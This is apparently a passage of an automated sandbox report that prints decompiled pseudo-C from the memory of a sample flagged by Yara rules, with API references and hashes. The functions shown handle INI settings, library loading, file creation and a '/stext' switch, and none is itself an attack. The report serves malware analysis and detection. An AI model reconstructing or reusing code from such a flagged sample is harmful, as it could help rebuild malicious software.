                                                                                • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                                                • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EA72, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
				void _v8199;
				char _v8200;
				void* __ebx;
				int _t23;
				CHAR* _t31;

				E004118A0(0x2004, __ecx);
				_v8200 = 0;
				if(_a4 == 0) {
					memset( &_v8199, 0, 0x2000);
					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
					_t23 = E004067DC( &_v8200, __edi, _a16);
				} else {
					memset( &_v8199, 0, 0x2000);
					_t31 =  &_v8200;
					E00406763(_t31, _a16,  *__edi);
					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
				}
				return _t23;
			}








                                                                                0x0040ea7a
                                                                                0x0040ea85
                                                                                0x0040ea8b
                                                                                0x0040ead5
                                                                                0x0040eaf3
                                                                                0x0040eb03
                                                                                0x0040ea8d
                                                                                0x0040ea9a
                                                                                0x0040eaa1
                                                                                0x0040eaaa
                                                                                0x0040eabe
                                                                                0x0040eabe
                                                                                0x0040eb0d

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040EA9A
                                                                                  • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                                  • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                                                • memset.MSVCRT ref: 0040EAD5
                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                • String ID:
                                                                                • API String ID: 3143880245-0
                                                                                • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                                                • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B785, Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				struct HICON__* _t19;
				intOrPtr* _t23;
				void* _t25;

				_t23 = __ebx;
				_t14 = __eax;
				 *((intOrPtr*)(__ebx + 0x124)) = 0;
				 *__ebx = 0x41356c;
				 *((intOrPtr*)(__ebx + 0x258)) = 0;
				_push(0x14);
				 *((intOrPtr*)(__ebx + 0x374)) = 0;
				L004115D0();
				if(__eax == 0) {
					_t14 = 0;
					__eflags = 0;
				} else {
					 *0x417114 = __eax;
				}
				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
				L004115D0(); // executed
				_t32 = _t14;
				_t25 = 0xf38;
				if(_t14 == 0) {
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = E00404016(_t14, _t32);
				}
				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
				 *((intOrPtr*)(_t23 + 0x378)) = 0;
				 *((intOrPtr*)(_t23 + 0x260)) = 0;
				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
				 *((intOrPtr*)(_t23 + 0x154)) = 0;
				_t16 =  *(_t23 + 0x258);
				if(_t16 != 0) {
					DeleteObject(_t16);
					 *(_t23 + 0x258) = 0;
				}
				_t17 = E00406252(); // executed
				 *(_t23 + 0x258) = _t17;
				E00401000(_t25, _t23 + 0x158, 0x413480);
				_t19 = LoadIconA( *0x416b94, 0x65); // executed
				E004017A4(_t23, _t19);
				return _t23;
			}












                                                                                0x0040b785
                                                                                0x0040b785
                                                                                0x0040b789
                                                                                0x0040b78f
                                                                                0x0040b795
                                                                                0x0040b79b
                                                                                0x0040b79d
                                                                                0x0040b7a3
                                                                                0x0040b7ab
                                                                                0x0040b7b4
                                                                                0x0040b7b4
                                                                                0x0040b7ad
                                                                                0x0040b7ad
                                                                                0x0040b7ad
                                                                                0x0040b7bb
                                                                                0x0040b7c1
                                                                                0x0040b7c6
                                                                                0x0040b7c8
                                                                                0x0040b7c9
                                                                                0x0040b7d4
                                                                                0x0040b7d4
                                                                                0x0040b7cb
                                                                                0x0040b7cd
                                                                                0x0040b7cd
                                                                                0x0040b7d6
                                                                                0x0040b7dc
                                                                                0x0040b7e2
                                                                                0x0040b7e8
                                                                                0x0040b7ee
                                                                                0x0040b7f4
                                                                                0x0040b7fc
                                                                                0x0040b7ff
                                                                                0x0040b805
                                                                                0x0040b805
                                                                                0x0040b80b
                                                                                0x0040b81b
                                                                                0x0040b821
                                                                                0x0040b82e
                                                                                0x0040b837
                                                                                0x0040b840

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$DeleteIconLoadObject
                                                                                • String ID:
                                                                                • API String ID: 1986663749-0
                                                                                • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                                                • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411932, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E00411932() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x417528;
				if(_t1 != 0) {
					_push(_t1);
					L004115D6();
				}
				_t2 =  *0x417530;
				if(_t2 != 0) {
					_push(_t2); // executed
					L004115D6(); // executed
				}
				_t3 =  *0x41752c;
				if(_t3 != 0) {
					_push(_t3);
					L004115D6();
				}
				_t4 =  *0x417534;
				if(_t4 != 0) {
					_push(_t4); // executed
					L004115D6(); // executed
					return _t4;
				}
				return _t4;
			}







                                                                                0x00411932
                                                                                0x00411939
                                                                                0x0041193b
                                                                                0x0041193c
                                                                                0x00411941
                                                                                0x00411942
                                                                                0x00411949
                                                                                0x0041194b
                                                                                0x0041194c
                                                                                0x00411951
                                                                                0x00411952
                                                                                0x00411959
                                                                                0x0041195b
                                                                                0x0041195c
                                                                                0x00411961
                                                                                0x00411962
                                                                                0x00411969
                                                                                0x0041196b
                                                                                0x0041196c
                                                                                0x00000000
                                                                                0x00411971
                                                                                0x00411972

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                                                • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040787D, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E0040787D() {
				void* _t13;
				signed int _t16;
				signed int _t18;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;

				_t33 =  *0x417540;
				if(_t33 == 0) {
					_push(0x8000);
					 *0x417540 = 0x8000;
					 *0x417544 = 0x100;
					 *0x417548 = 0x1000; // executed
					L004115D0(); // executed
					 *0x417528 = 0x8000;
					_t27 = 4;
					_t16 =  *0x417544 * _t27;
					_push( ~(0 | _t33 > 0x00000000) | _t16);
					L004115D0();
					 *0x417530 = _t16;
					_t29 = 4;
					_t18 =  *0x417544 * _t29;
					_push( ~(0 | _t33 > 0x00000000) | _t18);
					L004115D0();
					_push( *0x417548);
					 *0x417534 = _t18; // executed
					L004115D0(); // executed
					 *0x41752c = _t18;
					return _t18;
				}
				return _t13;
			}









                                                                                0x0040787d
                                                                                0x00407884
                                                                                0x0040788b
                                                                                0x0040788c
                                                                                0x00407891
                                                                                0x0040789b
                                                                                0x004078a5
                                                                                0x004078aa
                                                                                0x004078b8
                                                                                0x004078b9
                                                                                0x004078c2
                                                                                0x004078c3
                                                                                0x004078c8
                                                                                0x004078d6
                                                                                0x004078d7
                                                                                0x004078e0
                                                                                0x004078e1
                                                                                0x004078e6
                                                                                0x004078ec
                                                                                0x004078f1
                                                                                0x004078f9
                                                                                0x00000000
                                                                                0x004078f9
                                                                                0x004078fe

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                                                • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004060FA, Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                0x004060fa
                                                                                0x004060fb
                                                                                0x004060ff
                                                                                0x0040614a
                                                                                0x00406101
                                                                                0x00406102
                                                                                0x00406104
                                                                                0x00406108
                                                                                0x0040610a
                                                                                0x0040610c
                                                                                0x00406116
                                                                                0x0040611e
                                                                                0x00406120
                                                                                0x00406124
                                                                                0x0040612e
                                                                                0x00406133
                                                                                0x00406137
                                                                                0x0040613c
                                                                                0x00406146
                                                                                0x00406146

                                                                                APIs
                                                                                • malloc.MSVCRT ref: 00406116
                                                                                • memcpy.MSVCRT ref: 0040612E
                                                                                • free.MSVCRT(00000000,00000000,73B74DE0,00406B49,00000001,?,00000000,73B74DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: freemallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3056473165-0
                                                                                • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                                                • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B8D7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E0040B8D7(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t54 = __eflags;
				_t49 = __edi;
				_t38 = 0;
				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
				_t24 =  *((intOrPtr*)(__edi + 0x37c));
				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
					_t51 = 0x412466;
				} else {
					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
					}
					_t51 = _t45;
				}
				_push(_t51);
				_push("/stext");
				L004115B2();
				if(_t24 != 0) {
					_t52 = E0040B841(_t24, _t51);
					__eflags = _t52 - _t38;
					if(_t52 <= _t38) {
						goto L15;
					}
					goto L9;
				} else {
					_t52 = 1;
					L9:
					E0040AF17(_t49, _t38); // executed
					E0040A5AC(_t49);
					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
						_t42 = 0x412466;
					} else {
						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
							_t42 = 0;
						} else {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
					_t38 = 1;
					E0040B0C2(_t49);
					L15:
					return _t38;
				}
			}












                                                                                0x0040b8d7
                                                                                0x0040b8d7
                                                                                0x0040b8e0
                                                                                0x0040b8e4
                                                                                0x0040b8f5
                                                                                0x0040b8fb
                                                                                0x0040b900
                                                                                0x0040b909
                                                                                0x0040b920
                                                                                0x0040b90b
                                                                                0x0040b90e
                                                                                0x0040b91a
                                                                                0x0040b91a
                                                                                0x0040b910
                                                                                0x0040b915
                                                                                0x0040b915
                                                                                0x0040b91c
                                                                                0x0040b91c
                                                                                0x0040b925
                                                                                0x0040b926
                                                                                0x0040b92b
                                                                                0x0040b934
                                                                                0x0040b940
                                                                                0x0040b942
                                                                                0x0040b944
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040b936
                                                                                0x0040b938
                                                                                0x0040b946
                                                                                0x0040b949
                                                                                0x0040b950
                                                                                0x0040b955
                                                                                0x0040b95f
                                                                                0x0040b976
                                                                                0x0040b961
                                                                                0x0040b961
                                                                                0x0040b965
                                                                                0x0040b972
                                                                                0x0040b967
                                                                                0x0040b96d
                                                                                0x0040b96d
                                                                                0x0040b965
                                                                                0x0040b98b
                                                                                0x0040b998
                                                                                0x0040b9a1
                                                                                0x0040b9a2
                                                                                0x0040b9a8
                                                                                0x0040b9ac
                                                                                0x0040b9ac

                                                                                APIs
                                                                                  • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                                                  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                                                  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                                                  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                                                  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                                                • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$_stricmpmemset
                                                                                • String ID: /stext
                                                                                • API String ID: 3575250601-3817206916
                                                                                • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                                                • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406252, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406252() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406191( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}





                                                                                0x00406264
                                                                                0x00406270
                                                                                0x00406277

                                                                                APIs
                                                                                  • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                  • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFontIndirectmemsetstrcpy
                                                                                • String ID: Arial
                                                                                • API String ID: 3275230829-493054409
                                                                                • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                                • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                                                • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                                • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004047A0, Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004047A0(CHAR* __esi, void* __eflags) {
				struct HINSTANCE__* _t8;
				char _t12;
				char* _t15;
				CHAR* _t17;

				_t17 = __esi;
				E004047F1(__esi);
				_t8 = LoadLibraryA(__esi); // executed
				__esi[0x200] = _t8;
				if(_t8 != 0) {
					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
					__esi[0x208] = _t12;
					if(_t12 != 0) {
						__esi[0x204] = 1;
					}
				}
				_t15 =  &(_t17[0x204]);
				if( *_t15 == 0) {
					E004047F1(_t17);
				}
				return  *_t15;
			}







                                                                                0x004047a0
                                                                                0x004047a2
                                                                                0x004047a8
                                                                                0x004047b0
                                                                                0x004047b6
                                                                                0x004047c0
                                                                                0x004047c8
                                                                                0x004047ce
                                                                                0x004047d0
                                                                                0x004047d0
                                                                                0x004047ce
                                                                                0x004047db
                                                                                0x004047e4
                                                                                0x004047e8
                                                                                0x004047e8
                                                                                0x004047f0

                                                                                APIs
                                                                                  • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID:
                                                                                • API String ID: 145871493-0
                                                                                • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                                                • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EB0E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                                                  • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                                  • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                                  • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                • String ID:
                                                                                • API String ID: 4165544737-0
                                                                                • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                                                • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004047F1, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004047F1(void* __eax) {
				struct HINSTANCE__* _t5;
				signed int* _t7;

				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
				_t7 = __eax + 0x200;
				_t5 =  *_t7;
				if(_t5 != 0) {
					_t5 = FreeLibrary(_t5); // executed
					 *_t7 =  *_t7 & 0x00000000;
				}
				return _t5;
			}





                                                                                0x004047f1
                                                                                0x004047f9
                                                                                0x004047ff
                                                                                0x00404803
                                                                                0x00404806
                                                                                0x0040480c
                                                                                0x0040480c
                                                                                0x00404810

                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                                                • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405EE4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405EE4(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                                                                0x00405ef6
                                                                                0x00405efc

                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                                                • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E894, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040E894(void* __esi) {
				struct HINSTANCE__* _t6;
				int _t7;

				_t6 =  *(__esi + 8);
				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
				if(_t6 != 0) {
					_t7 = FreeLibrary(_t6); // executed
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t7;
				}
				return _t6;
			}





                                                                                0x0040e894
                                                                                0x0040e897
                                                                                0x0040e89d
                                                                                0x0040e8a0
                                                                                0x0040e8a6
                                                                                0x00000000
                                                                                0x0040e8a6
                                                                                0x0040e8aa

                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                                                • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040ED91, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {

				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
				return 1;
			}



                                                                                0x0040eda0
                                                                                0x0040eda9

                                                                                APIs
